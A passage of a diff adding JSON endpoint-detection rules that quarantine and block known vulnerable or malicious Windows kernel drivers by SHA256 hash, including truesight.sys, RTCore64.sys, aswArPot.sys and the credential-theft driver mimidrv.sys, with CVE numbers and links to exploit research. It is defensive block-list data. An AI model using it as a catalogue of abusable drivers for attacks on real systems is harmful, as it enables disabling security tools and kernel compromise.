+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ecfe291-ad0b-5c2e-b4be-0d17c8790897",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978265Z",
+ "creation_date": "2026-03-23T11:45:29.978267Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978273Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "25d16b2b53fc7b52a65616ab7fc04a503946c20fe96556681bfaddd589401f4a",
+ "comment": "Malicious Kernel Driver (aka wantd_2.sys) [https://www.loldrivers.io/drivers/aa687f89-4f3b-4b59-b64e-fee5e2ae2310/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ed2c5cc-a617-59dc-b243-81501b587c74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ 
"global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835115Z",
+ "creation_date": "2026-03-23T11:45:30.835118Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835128Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "818c8775305dd8ba8e7f0d1288e2e55263cbc6a43537afcfa396c0bf78bc85c0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ed4b142-a4df-5648-891b-e9a6e5c64201",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622742Z",
+ "creation_date": "2026-03-23T11:45:29.622744Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622749Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ 
"rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad44cfd9c6262a6ff36ee9d03e59ba4b0524ef87f6b980ce15abb10a35d39f88",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1eddd2cd-75b0-58f6-bfac-dbfc0ef0c3cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488517Z",
+ "creation_date": "2026-03-23T11:45:31.488519Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488525Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e080f8de089ab20471c9997c9eae8137e961929baa8393aa10adbf3fefbd69d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1edec569-c21c-5d5d-8051-5022133d0284",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153754Z",
+ "creation_date": "2026-03-23T11:45:31.153756Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153762Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a350230410e13cd62cc24a04d5a878ad99e7af0e9698a3f8a8c0eb291341cd24",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ee17096-ce07-557c-bed2-c993e277561c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817268Z",
+ "creation_date": "2026-03-23T11:45:31.817270Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817276Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": 
"56e4738d3e3d0df82ac63ee95648db53e462d6916c55a2d49208703c3ded46a6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ee3b266-a016-598d-8420-90c953a3227d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827694Z",
+ "creation_date": "2026-03-23T11:45:31.827696Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827702Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e8c22851b9c42ca5429e4f7d5afcf3757a16c4bae072eba3f2888b9c20ed15ea",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1ef0ffec-0ce7-59a5-9436-cc86d31e0d4d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ 
"last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975272Z",
+ "creation_date": "2026-03-23T11:45:29.975274Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975280Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb82d8c29127955d58dff58978605a9daa718425c74c4bce5ae3e53712909148",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f01b7be-3ceb-5c2f-9b00-f6696ec38a2d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984264Z",
+ "creation_date": "2026-03-23T11:45:29.984267Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984275Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": 
"dd573f23d656818036fc9ae1064eda31aca86acb9bc44a6e127db3ea112a9094",
+ "comment": "Vulnerable Kernel Driver (aka irec.sys) [https://www.loldrivers.io/drivers/d74fdf19-b4b0-4ec2-9c29-4213b064138b/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f0b737a-add9-5f72-b4ba-ff015081f5f6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969664Z",
+ "creation_date": "2026-03-23T11:45:29.969666Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969672Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b84b27e0fd011545f447c8c630beeadc2581b7b43fba3b53575f6e2fb92d197b",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f147bec-6bfa-5cfe-9c67-031eef9861ff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": 
"b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483308Z",
+ "creation_date": "2026-03-23T11:45:31.483312Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483322Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ed31d19a9ee7cb12f99c5b706e265bb6b10eec85c5b89126a23f2f856a28fe79",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f2188da-a9b2-5723-b9cb-b01c180f045f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608613Z",
+ "creation_date": "2026-03-23T11:45:29.608615Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608621Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "147ea2957c15a5c92c6b7f8f2811e29e9f2c4df1efdbd69b79eeab40652861ef",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash 
SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f328423-3149-5010-b783-994b9e38cd6d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972003Z",
+ "creation_date": "2026-03-23T11:45:29.972005Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972010Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "57a389da784269bb2cc0a258500f6dfbf4f6269276e1192619ce439ec77f4572",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "1f352714-0552-5037-a478-bfee437d06e8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822228Z",
+ "creation_date": "2026-03-23T11:45:30.822230Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822235Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "df813922fcebbcaae99314cc207ec95111a6599ec7fb2d723f6bb1052c493c8a", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1f6379eb-d8a8-5c08-aa62-a15422c01fba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621427Z", + "creation_date": "2026-03-23T11:45:29.621428Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621434Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2d195cd4400754cc6f6c3f8ab1fe31627932c3c1bf8d5d0507c292232d1a2396", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1f7952d7-ff01-5897-a9a4-54c891177916", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479111Z", + "creation_date": "2026-03-23T11:45:31.479115Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479124Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5001b9e561ca074ea92eeee37e1cbd08b11caacece4af05050875aee4872d3e4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1f7eb42e-e99a-5983-8a2e-d6a1c83842a6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832660Z", + "creation_date": "2026-03-23T11:45:30.832662Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832667Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "8efda1292eff521b42d38ffc75e5ecfa4fa255658fb768adf53d111ed25da6cf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1f880eba-d0bc-58c4-b529-bc568278c505", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607561Z", + "creation_date": "2026-03-23T11:45:29.607563Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607568Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3ff50c67d51553c08dcb7c98342f68a0f54ad6658c5346c428bdcd1f185569f6", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1f88d06c-031a-5c6f-8209-7a7db9b9f4af", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820954Z", + "creation_date": "2026-03-23T11:45:30.820957Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820965Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c186967cc4f2a0cb853c9796d3ea416d233e48e735f02b1bb013967964e89778", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1f8fd750-2d83-5c91-8134-22c87e089c3e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616721Z", + "creation_date": "2026-03-23T11:45:29.616723Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616729Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "038f39558035292f1d794b7cf49f8e751e8633daec31454fe85cccbea83ba3fb", + "comment": "Vulnerable Kernel Driver (aka amifldrv64.sys) 
[https://www.loldrivers.io/drivers/a5eb98bf-2133-46e8-848f-a299ea0ddefa/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1f93204f-1339-552a-a546-0502a90d332d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490066Z", + "creation_date": "2026-03-23T11:45:31.490068Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490074Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a61c0d6e44ae7634598b91c71d8c84982c378ae341af6f7d485b808948e09630", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1f957a54-c58f-5020-aa12-12549afd8993", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605156Z", + "creation_date": 
"2026-03-23T11:45:29.605158Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605163Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "57982057bae3808abd3417d0827fcf596f979f824cff149b2f8cdcf25b86396f", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1f973f29-96dd-5120-b476-4b463d4a3bc7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465596Z", + "creation_date": "2026-03-23T11:45:30.465599Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465608Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "15cf366f7b3ee526db7ce2b5253ffebcbfaa4f33a82b459237c049f854a97c0c", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 